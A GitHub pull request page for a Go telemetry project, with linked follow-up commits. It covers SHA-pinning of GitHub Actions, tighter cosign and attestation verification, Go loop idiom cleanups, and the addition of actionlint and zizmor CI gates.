Skip to content

[chore] follow-ups omnibus: SHA-pin Actions + idiom sweep + cleanup#55

Merged
trilamsr merged 1 commit into
mainfrom
worktree-followups-omnibus
May 18, 2026
Merged

[chore] follow-ups omnibus: SHA-pin Actions + idiom sweep + cleanup#55
trilamsr merged 1 commit into
mainfrom
worktree-followups-omnibus

Conversation

@trilamsr

@trilamsr trilamsr commented May 18, 2026

Copy link
Copy Markdown
Contributor

What this PR does

Bundles 8 ready-now items from docs/FOLLOWUPS.md whose triggers were
satisfied; closes 2 more as already-shipped or already-satisfied. Three
themes: CI/release-pipeline hardening, code-quality sweeps, and
FOLLOWUPS hygiene.

CI / release-pipeline hardening:

  • SHA-pin every GitHub Actions ref across all workflows. Dependabot's
    github-actions group keeps these bumped weekly as one grouped PR.
  • Reconcile actions/upload-artifact major-version drift: callsites
    were split between @v5 and @v7.0.1. Unified on v7.0.1.
  • Tighten cosign verify-blob smoke check with --certificate-github-workflow-ref refs/tags/$TAG and --trigger push. Strictly tighter than the prior IDENTITY_REGEXP-only check.
  • Mirror tightened flags in docs/reproducibility.md step 5; add --source-ref / --source-digest to step 6's gh attestation verify.
  • Emit Rekor logIndex URL into release notes so transparency-log audits don't require bundle archaeology.
  • Wire make mod-verify into make ci.

Code-quality sweeps:

  • Convert ~49 C-style for i := 0; i < N; i++ loops to Go 1.22+ for i := range N (or for range N when the index is unused). 6 holdouts have non-convertible conditions (compound &&, i += 2, or non-i predicate).
  • Backfill 18 raw "Normal"/"Warning" sites in k8sevents tests to use EventTypeNormal / EventTypeWarning constants.
  • Export k8sevents.ComponentType = "k8s_events"; convert 8 test callsites.
  • Lock the no-Server-header invariant in internal/telemetry with a test. (Audit finding: Go's net/http does not emit a default Server header in any path; the FOLLOWUPS row had nothing to strip — the test prevents future regression.)

Closed-as-stale (no code change, FOLLOWUPS updated with rationale):

Linked issue(s)

No linked issue.

Release notes

[SECURITY] All GitHub Actions are now SHA-pinned; cosign and gh attestation verification flags are tightened to bind to the exact release tag and `push` trigger.
[ENHANCEMENT] Release notes include a Rekor transparency-log entry URL for after-the-fact audit.

Checklist

  • Tests added or updated (TestServer_NoServerHeader; existing tests continue to pass)
  • make ci passes on the worktree branch (exit 0)
  • Commits are signed off
  • No new components; existing component STYLE.md layout untouched

Test plan

  • make ci exit 0 (coverage above floor, govulncheck clean, doc-check + alert-check pass, vet clean across default + dcgm build tags)
  • CI green on this PR
  • Release dry-run not exercised — release workflow only fires on tag push; flag-tightening + Rekor URL emission verified by inspection rather than e2e. Worth a manual workflow_dispatch once merged or at next tag cut.

🤖 Generated with Claude Code

…leanup

Bundles 8 ready-now items from docs/FOLLOWUPS.md whose triggers were
satisfied. Two further items were verified stale during execution and
closed in the FOLLOWUPS file rather than re-implemented.

CI / release-pipeline hardening:
- SHA-pin every GitHub Actions ref across all workflows (checkout,
  setup-go, upload-artifact, codeql-action/*, setup-qemu-action,
  govulncheck-action). Dependabot's github-actions group keeps these
  bumped weekly as one grouped PR.
- Reconcile actions/upload-artifact major-version drift: callsites
  were split across @v5 (chaos / kernelevents-integration /
  nccl-fr-fuzz-nightly) and @v7.0.1 (release / ci). Unified on v7.0.1.
- Tighten cosign verify-blob smoke check with
  --certificate-github-workflow-ref refs/tags/$TAG and --trigger push.
  Strictly tighter than the prior IDENTITY_REGEXP-only check; binds to
  this exact tag and rejects workflow_dispatch bundles.
- Mirror the tightened flags in docs/reproducibility.md step 5; add
  --source-ref / --source-digest to step 6's gh attestation verify.
- Emit Rekor logIndex URL into the release body so transparency-log
  audits don't require bundle archaeology.
- Wire `make mod-verify` into `make ci` (cheap GOPROXY defense).

Code-quality sweeps:
- Convert ~49 C-style `for i := 0; i < N; i++` loops to Go 1.22+
  `for i := range N` (or `for range N` when the index is unused).
  6 holdouts have non-convertible conditions (compound &&,
  non-unit `i += 2`, or non-`i` predicate).
- Backfill 18 raw "Normal"/"Warning" sites in components/receivers/
  k8sevents tests to use EventTypeNormal / EventTypeWarning constants.
- Export k8sevents.ComponentType = "k8s_events"; convert 8 test
  callsites of pipeline.MustNewType("k8s_events") to use the constant.
- Lock the no-Server-header invariant with TestServer_NoServerHeader
  in internal/telemetry. (Audit: Go's net/http does not emit a default
  Server header in any path; the FOLLOWUPS row "Server: header strip"
  has nothing to strip — the test prevents future regression.)

Closed-as-stale (no code change, FOLLOWUPS updated with rationale):
- Next-up #1 `make doc-check`: shipped previously (Makefile:192, in
  `make ci` chain) but FOLLOWUPS still listed it as next-up.
- M8 opportunistic "promote build-tags to pr-validation.yml":
  ci.yml:37 already runs `make build-tags` as its own named step
  and no `pr-validation.yml` workflow exists in the tree.

Verification:
- `make ci` exit 0 on the worktree branch.
- Coverage above floor on every package, govulncheck clean, doc-check
  + alert-check pass, vet clean across default + dcgm build tags.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Signed-off-by: Tri Lam <trilamsr@gmail.com>
@trilamsr trilamsr merged commit a5af62f into main May 18, 2026
17 of 18 checks passed
@trilamsr trilamsr deleted the worktree-followups-omnibus branch May 18, 2026 19:13
trilamsr added a commit that referenced this pull request May 18, 2026
## What this PR does

Backfills documentation tracking that PR #55 (the follow-ups omnibus)
didn't touch:

1. **`CHANGELOG.md`** — new `### Security` section under `[Unreleased]`
   with the SHA-pin / cosign-flag-tightening entries; new `### Changed`
   rows for the Rekor `logIndex` URL emission in release notes and
   `mod-verify` wired into `make ci`.
2. **`docs/notes/pr-workflow.md`** — repo-wide lesson: audit
   `docs/FOLLOWUPS.md` rows for staleness *before* implementing. 2 of
   10 omnibus items were already shipped but still listed; trust the
   code, not the row.
3. **`.claude/notes/automation.md`** — agent-internal lesson: don't
   escape backticks inside a single-quoted HEREDOC. PR #55's body fed
   the `pr-lint` awk regex literal backslashes instead of
   triple-backticks; the required check went red until the body was
   re-edited via `gh pr edit`.

No code changes; `make doc-check` clean.

## Linked issue(s)

_No linked issue._

## Release notes

```release-notes
NONE
```

## Checklist

- [x] No code change; docs-only
- [x] `make doc-check` passes
- [x] Commits are signed off

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
trilamsr added a commit that referenced this pull request May 19, 2026
Adds actionlint (https://github.com/rhysd/actionlint) as a CI gate
covering all `.github/workflows/*.yml` files. Catches yaml syntax
issues and shellcheck violations in `run:` blocks before they break a
PR's required-check.

Wired via the existing repo convention: `go get -tool` adds it to the
go.mod tool stanza (alongside golangci-lint, gofumpt, addlicense,
goimports, govulncheck). `make actionlint` invokes `go tool
actionlint`, so the version is pinned in go.sum and Dependabot's
weekly go-deps group keeps it bumped.

Audit result: zero findings on current workflows. The PR #55 sweep
(SHA-pin all Actions) had no actionlint validating it; this gate
ensures the next workflow yaml edit doesn't ship a regression.

Closes the actionlint half of the FOLLOWUPS "CI Actions linters" row.
zizmor remains open as a separate follow-up — it surfaces a
different finding class (expression injection, untrusted input in
run-blocks, over-broad permissions) and is expected to produce real
findings on release.yml's 400 lines.

Verification:
- `make actionlint` exit 0 (10 workflow files clean)
- `make ci` exit 0 end-to-end

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Signed-off-by: Tri Lam <trilamsr@gmail.com>
trilamsr added a commit that referenced this pull request May 19, 2026
## What this PR does

Adds [actionlint](https://github.com/rhysd/actionlint) as a CI gate
covering `.github/workflows/*.yml`. Catches yaml syntax issues and
shellcheck violations in `run:` blocks before they break a PR's
required-check.

Wired via the existing repo convention: `go get -tool` adds it to
the go.mod tool stanza (alongside golangci-lint, gofumpt,
addlicense, goimports, govulncheck). `make actionlint` invokes
`go tool actionlint`, so the version is pinned in go.sum and
Dependabot's weekly go-deps group keeps it bumped.

**Audit result: zero findings on current workflows.** The PR #55
sweep (SHA-pin all Actions) had no actionlint validating it; this
gate ensures the next workflow yaml edit doesn't ship a regression.

Closes the actionlint half of the FOLLOWUPS "CI Actions linters"
row. zizmor remains open as a separate follow-up — different
finding class (expression injection, untrusted input in run-blocks,
over-broad permissions) and expected to produce real findings on
release.yml's 400 lines.

## Linked issue(s)

_No linked issue._

## Release notes

```release-notes
NONE
```

## Checklist

- [x] `make actionlint` exit 0 (10 workflow files clean)
- [x] `make ci` exit 0 end-to-end
- [x] go.mod / go.sum tidied (`make tidy-check` passes)
- [x] Commits are signed off

## Test plan

- [x] Local `make ci` green
- [ ] CI green on this PR
- [ ] After merge: a future PR that introduces a yaml syntax error or
shellcheck-flagged `run:` block fails the new gate

🤖 Generated with [Claude Code](https://claude.com/claude-code)

---------

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
trilamsr added a commit that referenced this pull request May 19, 2026
## What this PR does

Follow-up to #64 (zizmor security-lint gate). Trims comments that
didn't pass the six-months-cold-reader test. The commit was prepared
on the #64 branch but pushed seconds after that PR auto-merged, so it
never made it in — re-applying as a standalone follow-up.

Comments trimmed:

- `scripts/zizmor.sh`: dropped per-flag descriptions in the header
  block — `--no-progress` and `--config` don't need explainers; the
  WHY for `--min-severity=high` stays. Also fixed a stale error-
  message prefix copied from register-lint.
- `.github/zizmor.yml`: 6 lines → 3. Kept the one load-bearing claim
  ("ignores live inline").
- `release.yml` cache-poisoning ignores: 6 lines → 2. Kept the WHY
  (cache keyed on go.sum, trust root M3 already validates); dropped
  the meta-pointer to zizmor.yml (which no longer carries the
  rationale) and the audit-confidence parens.
- `release.yml` INPUT_TAG env comment: 4 lines → 2.

No behavior change. `make ci` exit 0 (one transient kernelevents
flake on first run, passed on retry — same intermittent test seen
in this session's PRs #55, #60, #62, #63, #64).

## Linked issue(s)

_No linked issue._ Follows up #64.

## Release notes

```release-notes
NONE
```

## Checklist

- [x] `make ci` exit 0
- [x] No behavior change; pure documentation hygiene
- [x] Commits are signed off

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
trilamsr added a commit that referenced this pull request May 19, 2026
#68)

## What this PR does

Two small fixes that turn this session's lessons into code instead of
notes-to-self:

### 1. Deflake `TestJournaldSource_StreamsMockOutput`

The 2s deadline for the mock-journalctl test was tight on loaded
macOS / CI runners — subprocess spawn + fixture read + goroutine
schedule could miss it. The test flaked on 5 of 5 PRs in this
session that exercised the full suite (#55, #60, #62, #63, #64).

Bumped the deadline 2s → 5s. The non-flake budget for "no record
ever emitted" regressions stays well under the deadline; 5s just
absorbs runner jitter without hiding real bugs.

### 2. Warn locally when `shellcheck` isn't on PATH

`actionlint` silently skips run-block shellcheck when shellcheck
isn't on PATH (macOS doesn't ship shellcheck by default). PR #62
passed `make actionlint` locally and then surfaced 4 shellcheck
findings in CI — exactly the failure mode the gate is supposed to
prevent.

`make actionlint` now prints a `WARNING: shellcheck not on PATH;
actionlint will skip run-block shellcheck.` line with `brew
install` / `apt-get install` hints when the binary is missing.
The underlying lint still runs; the warning just makes the gap
visible to the macOS dev.

## Linked issue(s)

_No linked issue._

## Release notes

```release-notes
NONE
```

## Checklist

- [x] `make ci` exit 0 (test passes deterministically with new deadline)
- [x] `make actionlint` shows the warning when shellcheck is uninstalled
(verified locally)
- [x] No behavior change in CI (shellcheck already on Linux runners)
- [x] Commits are signed off

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Signed-off-by: Tri Lam <trilamsr@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant